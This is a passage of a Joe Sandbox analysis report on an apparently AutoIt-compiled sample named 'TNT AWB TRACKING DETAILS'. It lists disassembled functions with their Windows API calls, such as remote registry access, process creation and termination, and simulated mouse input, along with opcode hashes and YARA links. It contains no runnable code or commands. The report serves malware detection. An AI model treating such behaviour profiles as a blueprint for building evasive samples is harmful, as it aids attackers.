Instruction Fuzzy Hash: 6B618B3050065A9BCF11EF60CD82EFF3BA9AF0A308F0545A9F8595B2D2DB35AD16CB50

Function 00B201E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00B20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B202BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B202FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B20320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B20349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B2038C
RegCloseKey.ADVAPI32(00000000), ref: 00B20399

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 134db0f6cbae49fa97fb1e36d506faf632c67d5943f59f543cc329b29d47bd1e
Instruction ID: 4a74f79325e99ca2ec1620e8e8ea94dd4412e2dcd1f1f9b1b001385c1cfc3947
Opcode Fuzzy Hash: 134db0f6cbae49fa97fb1e36d506faf632c67d5943f59f543cc329b29d47bd1e
Instruction Fuzzy Hash: AB515831118204AFC714EF64D985EAFBBE9FF89314F04496DF5498B2A2DB31E905CB52

Function 00B25799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B257FB
GetMenuItemCount.USER32(00000000), ref: 00B25832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B2585A
GetMenuItemID.USER32(?,?), ref: 00B258C9
GetSubMenu.USER32(?,?), ref: 00B258D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00B25928

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 55a3ee2782943887740c00d9bedd73d9926cdbd097d3262201725556bf24dfbb
Instruction ID: b766e60202e1c7d1dad5ee3488f26add68afc11132a2aa9e50b3a29e4a2bfd6b
Opcode Fuzzy Hash: 55a3ee2782943887740c00d9bedd73d9926cdbd097d3262201725556bf24dfbb
Instruction Fuzzy Hash: C0513C35E00625EFCF21EF64D945AAEBBF4EF49710F1040A9E855AB351CB74AE418B90

Function 00AFEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AFEF06
VariantClear.OLEAUT32(00000013), ref: 00AFEF78
VariantClear.OLEAUT32(00000000), ref: 00AFEFD3
_memmove.LIBCMT ref: 00AFEFFD
VariantClear.OLEAUT32(?), ref: 00AFF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AFF078

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: be2a792107e96d07dc7b61776b383c1f7727d0457633abf882788fbef51af75b
Instruction ID: 567e38012937fb70f4bedcfa4344f44688f54ecb5e4b0c8f4f21c04e8210d2db
Opcode Fuzzy Hash: be2a792107e96d07dc7b61776b383c1f7727d0457633abf882788fbef51af75b
Instruction Fuzzy Hash: 93514CB5A00209DFDB24DF58C884AAAB7B8FF4C314B158569FA59DB301E735E911CBA0

Function 00B0220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B022A3
IsMenu.USER32(00000000), ref: 00B022C3
CreatePopupMenu.USER32 ref: 00B022F7
GetMenuItemCount.USER32(000000FF), ref: 00B02355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B02386

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
Instruction ID: c22353498250c2bc773c183873e818732d91378fe88db834d6c434cd05224861
Opcode Fuzzy Hash: ff865e76b7830dd195404a2eeb62ff61d76eddc623d8d6e31ab5270e871437be
Instruction Fuzzy Hash: 7A518730A0020AEFDF21CF68C988BAEBFF5EF15314F1482A9E855A72D0D7748908CB55

Function 00AA1765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00AA179A
GetWindowRect.USER32(?,?), ref: 00AA17FE
ScreenToClient.USER32(?,?), ref: 00AA181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AA182C
EndPaint.USER32(?,?), ref: 00AA1876

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: f74daa432ced1969bf928229f66a811985a2ca3773112c586e0d7aa6150165a7
Instruction ID: 367d9218fc402d2c5ba4c10988c095c4dcec74392cd59c46f6c8c7dfa884fb9c
Opcode Fuzzy Hash: f74daa432ced1969bf928229f66a811985a2ca3773112c586e0d7aa6150165a7
Instruction Fuzzy Hash: 63419A30504701AFD721DF28CC84BBA7BF8EB4A724F044669F9A58B2E1CB749855DB62

Function 00B2B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00B657B0,00000000,013F5638,?,?,00B657B0,?,00B2B5A8,?,?), ref: 00B2B712
EnableWindow.USER32(00000000,00000000), ref: 00B2B736
ShowWindow.USER32(00B657B0,00000000,013F5638,?,?,00B657B0,?,00B2B5A8,?,?), ref: 00B2B796
ShowWindow.USER32(00000000,00000004,?,00B2B5A8,?,?), ref: 00B2B7A8
EnableWindow.USER32(00000000,00000001), ref: 00B2B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B2B7EF

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
Instruction ID: bd62717f9ca1ed3448c4741743d27eeec340c16dbe125f005b78d5f82ced25e6
Opcode Fuzzy Hash: 0d0869a1e09ab0f4a18b75bd9000c68e480f90b9c7487605965ba289c70c5bf8
Instruction Fuzzy Hash: FA415734601261AFDB26CF24E499FA57BE0EB45310F1841F9E94C8F6B2CB31AC56CB51

Function 00B1709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00B14E41,?,?,00000000,00000001), ref: 00B170AC

Part of subcall function 00B139A0: GetWindowRect.USER32(?,?), ref: 00B139B3

GetDesktopWindow.USER32 ref: 00B170D6
GetWindowRect.USER32(00000000), ref: 00B170DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B1710F

Part of subcall function 00B05244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B052BC

GetCursorPos.USER32(?), ref: 00B1713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B17199

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: aadc74168fefbc0ed1028fff5a669f5bf72dba75f72d99928067b08253db1583
Instruction ID: f31817b7ac059500df6319d66869796d771de6b0eb207f813e6ad7fb7b400a7d
Opcode Fuzzy Hash: aadc74168fefbc0ed1028fff5a669f5bf72dba75f72d99928067b08253db1583
Instruction Fuzzy Hash: 2231B272509306ABD720DF14C849F9BBBE9FF88314F000929F585A7191DB74EA59CB92

Function 00AF8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AF80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AF80C0
Part of subcall function 00AF80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AF80CA
Part of subcall function 00AF80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AF80D9
Part of subcall function 00AF80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AF80E0
Part of subcall function 00AF80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AF80F6

GetLengthSid.ADVAPI32(?,00000000,00AF842F), ref: 00AF88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00AF88D6
HeapAlloc.KERNEL32(00000000), ref: 00AF88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00AF88F6
GetProcessHeap.KERNEL32(00000000,00000000,00AF842F), ref: 00AF890A
HeapFree.KERNEL32(00000000), ref: 00AF8911

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: c1f735a04ed2a93427a8edc33cd912f86456917a4c3c0e80026a74cfb4a4ccfa
Instruction ID: c239eb1dfc2473b0b710f080484bc1ae3101f2a53fdc3d416b8d4edb0d351eb6
Opcode Fuzzy Hash: c1f735a04ed2a93427a8edc33cd912f86456917a4c3c0e80026a74cfb4a4ccfa
Instruction Fuzzy Hash: BD11AF31501209FFDB209FE4DC4ABBE7B78EB45352F504028FA85A7110CB7A9911DB60

Function 00AF85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00AF85E2
OpenProcessToken.ADVAPI32(00000000), ref: 00AF85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00AF85F8
CloseHandle.KERNEL32(00000004), ref: 00AF8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00AF8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00AF8646

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
Instruction ID: 8f7c0ec357756ea1c644f4be1bac4775852646cad407846ec78e30052406a053
Opcode Fuzzy Hash: 4cd5d600ffb9933d491e1637589591ff2384c2b582a66c558606ed73e5ea983f
Instruction Fuzzy Hash: 2E11477250024EABDF118FE4DD49FEA7BB9EB08704F044065FE04A2160CA768D61AB60

Function 00AFB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00AFB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00AFB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AFB7CD
ReleaseDC.USER32(00000000,00000000), ref: 00AFB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00AFB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00AFB7FE

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: fbd505c3fdfd6070ce66044e9825607cc38c8c2a0f655a1d6299464e8e009c89
Instruction ID: 391492c5ff16790ecf3cdcc1b5ee9509c4127868bd06052ffe27e6642a700dd9
Opcode Fuzzy Hash: fbd505c3fdfd6070ce66044e9825607cc38c8c2a0f655a1d6299464e8e009c89
Instruction Fuzzy Hash: 3A014475E00219BBEB10AFE6DD45E6EBFB8EB48751F004075FA04A7291DA709C11CFA1

Function 00AC0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC01C1

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
Instruction ID: 21afb50e52fba53bee43e2a9cefefd3fb430543e312957eb481af45e2e82bf75
Opcode Fuzzy Hash: 1f62baeddc988a5fe02822317f03e351965fa8db0ff0affc6d9cedbc6c8612db
Instruction Fuzzy Hash: 7D016CB090275A7DE3008F5A8C85B52FFB8FF19354F00411BA15C47941C7F5A868CBE5

Function 00B053E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B053F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B0540F
GetWindowThreadProcessId.USER32(?,?), ref: 00B0541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B05437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0543E

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
Instruction ID: b9754f1108b115233f340981fd952a2ceba96d55171bd1bef65db3548f9668a5
Opcode Fuzzy Hash: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
Instruction Fuzzy Hash: CAF01231541559BBD7315B929C0DEFF7A7CEBCAB11F000179F904D20519AA51A12C6B5

Function 00B07230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B07243
EnterCriticalSection.KERNEL32(?,?,00AB0EE4,?,?), ref: 00B07254
TerminateThread.KERNEL32(00000000,000001F6,?,00AB0EE4,?,?), ref: 00B07261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AB0EE4,?,?), ref: 00B0726E

Part of subcall function 00B06C35: CloseHandle.KERNEL32(00000000,?,00B0727B,?,00AB0EE4,?,?), ref: 00B06C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07281
LeaveCriticalSection.KERNEL32(?,?,00AB0EE4,?,?), ref: 00B07288

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
Instruction ID: 24dd9cfc503f57cc3aecd68fcd04778a9643eac27228feaa12d11107eacfeb44
Opcode Fuzzy Hash: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
Instruction Fuzzy Hash: B8F05E36945613EBEB611B64EE4C9FA7B79FF4A702B500571F503A20A4CF7A5812CF50

Function 00AF8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF899D
UnloadUserProfile.USERENV(?,?), ref: 00AF89A9
CloseHandle.KERNEL32(?), ref: 00AF89B2
CloseHandle.KERNEL32(?), ref: 00AF89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00AF89C3
HeapFree.KERNEL32(00000000), ref: 00AF89CA

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
Instruction ID: 6e5791723e9262b0151ee06415fae2be550f3cd7c88d0286fc65a24ac4b21ea2
Opcode Fuzzy Hash: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
Instruction Fuzzy Hash: 83E0C236004002FBDA115FE1ED0C92ABB79FB89322B508230F22992070CF329432DB50

Function 00B185ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B18613
CharUpperBuffW.USER32(?,?), ref: 00B18722
VariantClear.OLEAUT32(?), ref: 00B1889A

Part of subcall function 00B07562: VariantInit.OLEAUT32(00000000), ref: 00B075A2
Part of subcall function 00B07562: VariantCopy.OLEAUT32(00000000,?), ref: 00B075AB
Part of subcall function 00B07562: VariantClear.OLEAUT32(00000000), ref: 00B075B7

Strings

Incorrect Parameter format, xrefs: 00B1864B, 00B1880D
AUTOIT.ERROR, xrefs: 00B18728

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2194559739.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194641184.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194694413.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2194713048.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_TNT AWB TRACKING DETAILS.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 99248c5207a722ade39bbb132fa955f281b178353a899545d50cd2ae81a9df78
Instruction ID: 8b47466cbbbc03ffa899c11193b226bc61a77accd86438900d30cce9f759b866
Opcode Fuzzy Hash: 99248c5207a722ade39bbb132fa955f281b178353a899545d50cd2ae81a9df78
Instruction Fuzzy Hash: FC917C706043019FC710DF24C5859ABBBE4FF89714F5489AEF89A8B3A1DB30E945CB92

Function 00B02A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ABFC86: _wcscpy.LIBCMT ref: 00ABFCA9

_memset.LIBCMT ref: 00B02B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B02BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B02C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B02C97

Strings

0, xrefs: 00B02B73

Memory Dump Source

Source File: 00000000.00000002.2194578626.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

